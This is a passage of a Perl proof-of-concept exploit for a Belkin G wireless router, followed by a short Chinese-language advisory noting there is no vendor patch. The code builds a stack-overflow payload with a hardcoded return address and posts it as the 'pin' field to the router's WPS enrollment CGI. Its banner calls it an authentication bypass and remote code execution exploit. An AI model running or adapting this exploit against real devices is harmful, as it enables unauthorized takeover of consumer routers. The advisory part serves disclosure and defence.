my $junk="A"x32;
my $s0="BBBB";
my $s1="CCCC";
my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination.
my $nop="\x20\x20\x20\x20";
my $payload=$junk.$s0.$s1.$ra.$nop;
$url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
$response = $browser->post( $url,[ 'pin' => "$payload"]);
if( !$response->content )
{
print "[-] Damn! Something went wrong. This might not work here :-/\n";
}
else
{
print "[-] Done! \\m/\n";
}
}
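# Welcome - print the PoC banner and usage text, then take the router address
# from the command line.
#
# Reads  : $ARGV[0], the router address exactly as typed (not validated here).
# Writes : package variable $ip, which the request code in this file
#          interpolates into the URL it posts to ("http://$ip/cgi-bin/...").
# Exits  : with status 1 when no address is supplied, so a wrapper script can
#          tell a usage error apart from a completed run.
sub Welcome()
{
    # Banner and usage are printed on every run, before the argument check,
    # so a bare invocation still shows how the script is meant to be called.
    print "\n\n+------------------------------------------+\n";
    print "| Belkin G Wireless Router Remote Exploit |\n";
    print "| (Authentication bypass & RCE PoC) |\n";
    print "+------------------------------------------+\n";
    print "[+] By Aodrulez.\n";
    print "\n[+] Usage : perl $0 router_ip";
    print "\n[!] Example : perl $0 X.X.X.X";

    # A missing first argument (or a false one such as "" or "0") is a usage
    # error.
    if (!$ARGV[0])
    {
        print "\n[-] (o_0) Seriously??\n";
        exit 1;    # a bare `exit` reported success (status 0) on this error path
    }

    # NOTE(review): $ip is used verbatim inside a URL later on; nothing in this
    # sub checks that it is a well-formed address.
    $ip = $ARGV[0];
    print "\n[+] Target IP : $ip\n";
}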
# Burn!!
# Script entry point. Order matters: Welcome() prints the banner and stores
# the command-line address in $ip (or exits when none was given), so it has
# to run before anything that uses $ip.
Welcome();
# NOTE(review): Authenticate() is defined elsewhere in the file; presumably it
# is the routine that consumes $ip - confirm against its definition.
Authenticate();
# End of exploit code.
建议:
--------------------------------------------------------------------------------
厂商补丁:
Belkin
------
目前厂商还没有提供补丁或者升级程序。在补丁发布之前,建议仅允许受信任的主机访问路由器的 HTTP 服务(上文 PoC 请求的 /cgi-bin/wireless_WPS_Enroll.exe 即由该服务提供)。同时,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: